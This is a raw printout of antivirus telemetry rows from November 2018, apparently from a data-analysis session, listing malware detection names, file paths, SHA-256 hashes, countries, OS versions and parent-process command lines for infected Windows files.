  Row(detection=Row(filename='avscan-20181102-101139-0b866bbe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-101139-0B866BBE', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='a6afd06f85cf749ac48dd19ccce842ec5251a0ec026e44c4159b0f2e0ace8602', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:13:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{2EE500BE-2AB5-49DB-9AE1-E1ACF7D4782D}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='f030351daaac98d580492f18a9dabe541f2e6dc8249bc3a40a95e0c36e5dbe15', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:40:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-174142-49ff1fc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_864406a8\\AVSCAN-20181102-174024-427D8892\\AVSCAN-20181102-174142-49FF1FC8', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='e382b2754e9d655c30e73005ff3bdae57ca33692baa8bb3d26b327d341bd1067', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:41:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-171119-0996c29a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_074e821e\\AVSCAN-20181102-163806-F3CB18C2\\AVSCAN-20181102-171119-0996C29A', filesize=6656000, name='WORM/Lodbak.Gen.#M1.#R1'), hash='dc4d7d62f0e2429c9ad8f0bc7a8dd6610f838f752f855ce430ba8299b0faa79c', metadata=Row(cmdline=None, country='MN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T09:11:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tcc.exe', filepath='\\\\?\\C:\\Program Files\\ARM\\RVCT\\Programs\\3.1\\569\\win_32-pentium\\tcc.exe', filesize=8192000, name='W32/Ramnit.CD.#M1.#R1'), hash='e33e793188eb4f6528511a687c4341b915394ec6590538d6714516b391818516', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:41:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bpp.vir', filepath='C:\\Program Files\\Speedy PC Pro 2018 for TANAKA-PC\\bpp.VIR', filesize=2484000, name='HEUR/AGEN.1035709.#M1.#R1'), hash='a774e5704ad953eec9f19af8a5e53a4bf6ec9e29c0a2a84f28622a89b2539ebf', metadata=Row(cmdline='startupshow', country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malware Crusher\\mcr.exe', parentsize=3896168, timestamp='2018-11-02T13:39:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00296ba7', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296ba7', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:32:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215659-7b1c9932', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215659-7B1C9932', filesize=64000, name='TR/Siggen.64000.1.#M1.#R1'), hash='bff6eb442a00089abb08a519e3dc447241e8a0d37685002cf8a6c6f62e9fc6a1', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:57:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165353-cea4c098', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-151404-D70ED41C\\AVSCAN-20181104-165353-CEA4C098', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:53:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160511-9bd5ffbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b86276e2\\AVSCAN-20181103-124328-1505CFF1\\AVSCAN-20181104-160511-9BD5FFBD', filesize=832000, name='ADWARE/ConvertAd.Gen7.#M1.#R1'), hash='e1f9e2ddf2d95ce794c3dcf3f65443726d9cb1cc78d0b2f3fc524da65c074ef3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:05:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029344b', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029344b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:26:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023abc9', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023abc9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:04:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jre-6u6-.exe', filepath='G:\\BACKUP-DATA-SINTA\\DATA TGL 4 NOVEMBER 2018\\SINSIN\\SINTA\\MOZILLAF\\JRE-6U6-.EXE', filesize=16000000, name='W32/Sality.#M1.#R1'), hash='efcb561f4f92f9b62b1f5bd49a5a59d301f5e1c8596f41e84b88216be80d1f6a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:06:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c4e18b8671ccc1f9ba892713b0fbb1f592bdf4fdbedda079403ecdfe338517e0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\C4E18B8671CCC1F9BA892713B0FBB1F592BDF4FDBEDDA079403ECDFE338517E0', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='c4e18b8671ccc1f9ba892713b0fbb1f592bdf4fdbedda079403ecdfe338517e0', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:20:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T06:37:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-091645-1884a099', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-091645-1884A099', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:16:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b45f', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b45f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:13:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T17:00:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='efccc4625ac15467fb5d01f886edd7a5d169411d677e93ee6e53b2e0c35286cd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\EFCCC4625AC15467FB5D01F886EDD7A5D169411D677E93EE6E53B2E0C35286CD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='efccc4625ac15467fb5d01f886edd7a5d169411d677e93ee6e53b2e0c35286cd', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T14:53:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fee5de47656a3dc8e5e7265fc2b99f61db429f9311e5b2c87e1011988b705753', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\FEE5DE47656A3DC8E5E7265FC2B99F61DB429F9311E5B2C87E1011988B705753', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fee5de47656a3dc8e5e7265fc2b99f61db429f9311e5b2c87e1011988b705753', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:17:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Ink\\mip.exe', filesize=1216000, name='TR/Patched.Gen.#M300.#R2947'), hash='f9e8de58ee6501e4d26ccdfe60b0a188a3a01487bff45d2dfb923d19204f23f2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:29:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='server.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\InstallDir\\Server.exe', filesize=384000, name='DR/Delphi.Gen.#M300.#R273'), hash='fe4029696947def84af9e7b0df0557224dd01413779c35c1cd51941193ffa789', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4473304, timestamp='2018-11-04T08:07:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fc4ea35cb930699a0b1865ad4e339ff69495391ae3b12ef494589290ba1c226d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FC4EA35CB930699A0B1865AD4E339FF69495391AE3B12EF494589290BA1C226D', filesize=576000, name='HEUR/AGEN.1022030.#M1.#R1'), hash='fc4ea35cb930699a0b1865ad4e339ff69495391ae3b12ef494589290ba1c226d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:45:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-144634-234b5315', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_00648505\\AVSCAN-20181101-144046-0D01C425\\AVSCAN-20181101-144634-234B5315', filesize=1728000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='fdcce500c3a3dc6ecfed361274dcadab3f5e41b2e542763fd77b4d71fcbd2a99', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:39:59Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Music.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T07:13:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T12:22:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe436_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe436 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:37:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00010679', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00010679', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:33:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ifversion.dll', filepath='C:\\Program Files (x86)\\AspenTech\\Aspen HYSYS V7.1\\IFVersion.dll', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='6b41dc28bde442c5d161a7ddab28ca8f2b6fb75c507020de2926662ec11a21f1', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T21:12:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000106c7', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp000106c7', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:34:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-001408-0826af6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d0481283\\AVSCAN-20181103-001117-EB3997CA\\AVSCAN-20181103-001408-0826AF6B', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='penghasilan.pif', filepath='D:\\DOKUMENKU\\SUBID APUPPT\\PAJAK PENGHASILAN\\PENGHASILAN.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='du7o4lyc.taqfg.izfw9y.iyxdrp2d.ere.gtaqus.5jw.sbq', filepath='f:\\\xa0\\Du7o4lyc.taqfG.IzFw9y.IYxDrp2d.ERe.gtaqUS.5jw.SBQ', filesize=22096000, name='WORM/Lodbak.Gen4.#M300.#R300496'), hash='4bff1c0cdb987fc012d99118fdc9e3d8ef9f997dedb183deb545cbe3ff663253', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:28:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='penghasilan.pif', filepath='D:\\DOKUMENKU\\SUBID APUPPT\\PAJAK PENGHASILAN\\PENGHASILAN.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:36:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\program files\\avira\\antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T20:15:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7a07df65-5b21-e0e4-1780-f6f6e3c9135d.exe', filepath='F:\\{a2cc3a36-983a-40fe-82d7-3bf658be31b6}\\7a07df65-5b21-e0e4-1780-f6f6e3c9135d.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='626596cbba33ca077633c742d15edb9bd1be3ad602c74aa84d3634b6556b0f8f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T10:11:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T08:44:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='install.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Install\\Install.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105015-1c4df5d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d235a1c5\\AVSCAN-20181102-104953-18C80AF6\\AVSCAN-20181102-105015-1C4DF5D8', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:50:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ophcrack.exe', filepath='E:\\HBCD\\Programs\\OPHCrack.exe', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1bd9643d50cd60d80bfc219e44dad7f46165582534fb00e134e874a5c3c6766e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1BD9643D50CD60D80BFC219E44DAD7F46165582534FB00E134E874A5C3C6766E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1bd9643d50cd60d80bfc219e44dad7f46165582534fb00e134e874a5c3c6766e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:35:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6debbfbfbfed61bdaab4ce1b1b1feb10390a7fee70ed2dd9197fe0bb518fc95b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\6DEBBFBFBFED61BDAAB4CE1B1B1FEB10390A7FEE70ED2DD9197FE0BB518FC95B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6debbfbfbfed61bdaab4ce1b1b1feb10390a7fee70ed2dd9197fe0bb518fc95b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:19:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup activation.exe', filepath='C:\\Program Files (x86)\\Removewat 2.2.7\\Setup activation.exe', filesize=832000, name='HEUR/AGEN.1004038.#M1.#R1'), hash='30d54dbf8fb4ca056b55e739742ff8eb6b2221c321c18f7ef600c63641bb3439', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=45056, timestamp='2018-11-02T06:07:57Z'), dt=datetime.date(2018, 11, 2)),
